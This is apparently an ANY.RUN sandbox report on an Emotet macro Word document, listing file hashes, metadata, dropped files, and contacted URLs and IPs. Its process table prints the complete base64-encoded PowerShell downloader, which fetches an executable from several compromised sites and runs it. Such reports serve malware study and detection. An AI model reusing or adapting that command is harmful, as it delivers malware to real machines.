analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Data 901651 0440987554.doc

Full analysis: https://app.any.run/tasks/5301765d-4e04-49fa-9cf2-de9dd9b019df
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: May 24, 2019, 20:16:53
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Hawaii Synchronised Granite, Subject: Course, Author: Doug Jacobs, Comments: Concrete Bouvet Island (Bouvetoya), Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri May 24 20:43:00 2019, Last Saved Time/Date: Fri May 24 20:43:00 2019, Number of Pages: 1, Number of Words: 16, Number of Characters: 94, Security: 0
MD5:

E0E54A745D68DBB0E6BB8EB03E4CE2AE

SHA1:

31A899CFD0544D3F0CC87CD71C2F73F10441DBDF

SHA256:

525DF3E7FB2181E85B555FDFD86FFD0B2ABDF7F822E8C5DB0CE1B0947D7900EC

SSDEEP:

3072:477HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qLBHaRxOwh7:477HUUUUUUUUUUUUUUUUUUUT52VgBHaj

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2176)

    • PowerShell script executed

      • powershell.exe (PID: 2176)

    • Executed via WMI

      • powershell.exe (PID: 2176)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3932)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3932)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Manager: McCullough
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 109
Paragraphs: 1
Lines: 1
Company: Waelchi, Langosh and Thompson
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 94
Words: 16
Pages: 1
ModifyDate: 2019:05:24 19:43:00
CreateDate: 2019:05:24 19:43:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: Concrete Bouvet Island (Bouvetoya)
Keywords: -
Author: Doug Jacobs
Subject: Course
Title: Hawaii Synchronised Granite
CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3932"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\Data 901651 0440987554.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2176powershell -nop -e JAB0ADYAdwA0AHUAbwA9ACcAdwA2ADAATQB0AG8AbABFACcAOwAkAEYAegBiAFIAUABhAE4AegAgAD0AIAAnADUAOAA1ACcAOwAkAG4AQwBKAF8AXwAwAD0AJwBaADgAdwBzADQAbwBMAEIAJwA7ACQARwBoAHAAQwA2AFoAbwBKAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABGAHoAYgBSAFAAYQBOAHoAKwAnAC4AZQB4AGUAJwA7ACQAbwBTAFEAXwA3AE4AZgAwAD0AJwBwAHIATAAyAF8AbQAnADsAJABHADEAbwBCAEgAaQB0AGwAPQAmACgAJwBuAGUAJwArACcAdwAtAG8AYgAnACsAJwBqAGUAJwArACcAYwB0ACcAKQAgAG4AZQB0AC4AYAB3AEUAYgBDAGAATABJAGUAYABOAFQAOwAkAEQASwByAFQAWgA3AD0AJwBoAHQAdABwADoALwAvAGEAZABhAGMAYQBuAC4AbgBlAHQALwBjAGcAaQAtAGIAaQBuAC8AQQByAFEAbABZAFcAVABHAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AYwB6AGEAYgBrAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBFAGQAUQBkAG8ARwBuAGIAQgB6AC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AcgBpAC0AbQBhAGcAYQB6AGkAbgBlAC4AYwBvAG0ALwByAGkALwB1AHMAbwBkADcAaQBuAGwAYwAzAF8AYQA4AGIAbwBsAHQALQAzADUALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBzAGgAYQBuAGcALQBkAGkAbgBnAC4AYwBvAG0ALgB0AHcALwBwAGgAcABtAHkAYQBkAG0AaQBuAC8AegBlADIANAB5AHYAdgBvAG0AXwB0AGsAZABwAG0AbAAzADQAdwAtADUANgAwADQAOQAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHQAYQBmAGEALgBwAHgAbABjAG8AcgBwAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwB4AEUAVgBLAGUAeQBHAFMALwAnAC4AcwBwAGwASQBUACgAJwBAACcAKQA7ACQAbAA3AHcANQA4ADQAPQAnAEkATQBGAGoAaABtAFgAVAAnADsAZgBvAHIAZQBhAGMAaAAoACQASwB2AE0ATQA3AHAAegAgAGkAbgAgACQARABLAHIAVABaADcAKQB7AHQAcgB5AHsAJABHADEAbwBCAEgAaQB0AGwALgBEAE8AVwBOAEwAbwBBAEQAZgBJAGwARQAoACQASwB2AE0ATQA3AHAAegAsACAAJABHAGgAcABDADYAWgBvAEoAKQA7ACQAdgB3AEgAOABpAEIARQB1AD0AJwBuADcAdABRAE4AQQBTAFIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABHAGgAcABDADYAWgBvAEoAKQAuAEwARQBOAGcAdABoACAALQBnAGUAIAAzADkANwA3ADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAVABhAHIAVAAoACQARwBoAHAAQwA2AFoAbwBKACkAOwAkAFQARABJAEQAVAA0AFcAPQAnAFAANABDAEUAcwBwACcAOwBiAHIAZQBhAGsAOwAkAFgAdgAxAE0ANQBJAEIATgA9ACcAUgBoAFQARgBUADYAagBoACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHQASwBJAHMATQB6AGYANAA9ACcAYwBqADgAagAxAE8ARAAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 589
Read events
1 120
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
11

Dropped files

PID
Process
Filename
Type
3932WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3FCB.tmp.cvr
MD5:
SHA256:
2176powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BPOP0WTOIV7MZ288FOEN.temp
MD5:
SHA256:
3932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC3EF6D8.wmfwmf
MD5:E1289578501661DCB11981206602BC5F
SHA256:8D01395AEDB4EE8380F43E5FEBB9BC0C028B4668A838CC6676D2340ADA8520EC
3932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2B90EBA.wmfwmf
MD5:B3EE852CABECD172344AC6BECE686252
SHA256:5AE0283D7263A419DADF04DD58AC7FFCF97625B3F8A7DFCA63FE8E29A44B3B1F
3932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F6DDB73.wmfwmf
MD5:4A39D6158F8B5C36FB3CFD7D5D16ABB9
SHA256:231A0C62922FF06249D5060CCF6536BF85A881348E658B950A97ECA46E4ED216
3932WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Data 901651 0440987554.doc.LNKlnk
MD5:AAFCBC1572A90781D2EEC63A23D16E09
SHA256:5C9A47CAE1A67A14EA7DC278CACDEFEAEBD5F5B4CA2DAF5EAA5313D359BDFBDF
3932WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:1A27C6F75662FA0F21FD425753FD24F1
SHA256:891B1A94B283EF44973D4A90BBA7D32D904AC9C458C7B0E6BFB5229EBCE7B66A
2176powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF134ae7.TMPbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
3932WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:B17F6E7238413EB9DA58B8DDD0F9A72F
SHA256:2B1CFCAD0371A4FC00807878340583F8065D8510A2CC1F16B7E5D43E44E7D25B
3932WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:FC364354350804BC97FCC9AEF07F32AD
SHA256:92F1088DD2889EF5A10207CF69EE4CBB09EE8339CF991F0014322B6A82C5C463
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2176
powershell.exe
GET
404
104.31.86.57:80
http://www.czabk.com/wp-admin/EdQdoGnbBz/
US
xml
345 b
suspicious
2176
powershell.exe
GET
404
13.124.222.135:80
http://www.shang-ding.com.tw/phpmyadmin/ze24yvvom_tkdpml34w-56049/
KR
xml
345 b
unknown
2176
powershell.exe
GET
404
31.186.8.88:80
http://adacan.net/cgi-bin/ArQlYWTG/
TR
xml
345 b
suspicious
2176
powershell.exe
GET
404
175.176.161.147:80
http://www.tafa.pxlcorp.com/wp-includes/xEVKeyGS/
ID
xml
345 b
malicious
2176
powershell.exe
GET
404
143.95.233.86:80
http://www.ri-magazine.com/ri/usod7inlc3_a8bolt-35/
US
xml
345 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2176
powershell.exe
31.186.8.88:80
adacan.net
SAGLAYICI Teknoloji Bilisim Yayincilik Hiz. Ticaret Ltd. Sti.
TR
suspicious
2176
powershell.exe
143.95.233.86:80
www.ri-magazine.com
Colo4, LLC
US
suspicious
2176
powershell.exe
13.124.222.135:80
www.shang-ding.com.tw
Amazon.com, Inc.
KR
unknown
2176
powershell.exe
104.31.86.57:80
www.czabk.com
Cloudflare Inc
US
shared
2176
powershell.exe
175.176.161.147:80
www.tafa.pxlcorp.com
Varnion Technology Semesta, PT
ID
suspicious

DNS requests

Domain
IP
Reputation
adacan.net
  • 31.186.8.88
suspicious
www.czabk.com
  • 104.31.86.57
  • 104.31.87.57
suspicious
www.ri-magazine.com
  • 143.95.233.86
suspicious
www.shang-ding.com.tw
  • 13.124.222.135
unknown
www.tafa.pxlcorp.com
  • 175.176.161.147
malicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Data 901651 0440987554.doc